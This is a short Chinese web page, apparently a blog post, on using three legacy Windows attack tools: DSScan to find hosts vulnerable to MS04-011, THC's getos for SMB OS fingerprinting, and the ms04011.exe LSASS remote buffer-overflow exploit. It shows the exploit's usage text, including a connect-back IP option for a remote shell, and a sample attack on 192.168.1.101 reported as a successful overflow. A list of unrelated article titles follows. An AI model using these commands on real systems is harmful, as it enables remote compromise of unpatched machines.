DSScan使用

扫描目标主机是否存在ms04011漏洞



getos使用

获取操作系统类型

> getos.exe 192.168.1.101

-------------------------------------------------------

 THCsmbgetOS v0.1 - gets group, server and os via SMB

       by Johnny Cyberpunk (jcyberpunk@thc.org)

-------------------------------------------------------

[*] Connecting Port 139....

[*] Sending session request....

[*] Sending negotiation request....

[*] Sending setup account request....

[*] Successful....

Remote OS:

----------

WORKGROUP

Windows 2000 LAN Manager

Windows 5.1

ms04011使用

//帮助

> ms04011.exe

Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit

            bug discoveried by eEye,

            code by sbaa(sysop@sbaa.3322.org) 2004/04/24 ver 0.

            Usage:

            ms04011.exe 0 targetip (Port ConnectBackIP )

                         ---->  attack 2k (tested on cn sp4,en

            ms04011.exe 1 targetip (Port ConnectBackIP )

                         ---->  attack xp (tested on cn sp1)

//举例

> ms04011.exe 1 192.168.1.101

shellcode size 404

Ret value = 1726    //1726代表溢出成功

最新文章

1. Django Restful Framework （一）: Serializer
2. 【Thinking in Java】Java Callable的使用
3. postgresql导入及导出
4. TML5如何在移动网页端调用手机图片或者camera
5. c# 递归
6. 在VMware上安装CentOS-6.5 minimal - 配置网络
7. BZOJ2459 : [BeiJing2011]神秘好人
8. Duilib中系统消息在自己窗口类的使用
9. Codeforces Round #111 (Div. 2)
10. iOS NSString的常用用法
11. ie、IE兼容模式，提示SCRIPT1028: 缺少标识符、字符串或数字
12. DJANGO技巧两则：模拟MKDIR -P及配合NGINX上传大文件不使超时
13. poj 1329 Circle Through Three Points(求圆心+输出)
14. php流行笔试题及答案
15. ios 打电话结束返回到应用中
16. Cortex-M3知识点
17. linux 修改文件、文件夹权限
18. 后台数据download成excel的方法（controller/action）
19. 循环语句for,while,until,select
20. C#学习笔记-装饰模式

热门文章

1. 【FPGA】always (*) 后代码全部显示注释字体的颜色之解决方法
2. Manifest中meta-data扩展元素数据的配置与获取
3. android为什么不允许新开启一个线程来更新UI，而是用handler来更新界面
4. session与getSession()用法总结
5. 如何使用phantomJS来模拟一个HTML元素的鼠标悬停
6. Ajax验证
7. Celery-系统守护进程
8. [Linux] cronjob指定用户运行脚本，并按日期区分输出日志
9. WeQuant教程—1.5 实盘运行须知
10. django:删除表后怎么重新数据迁移生成表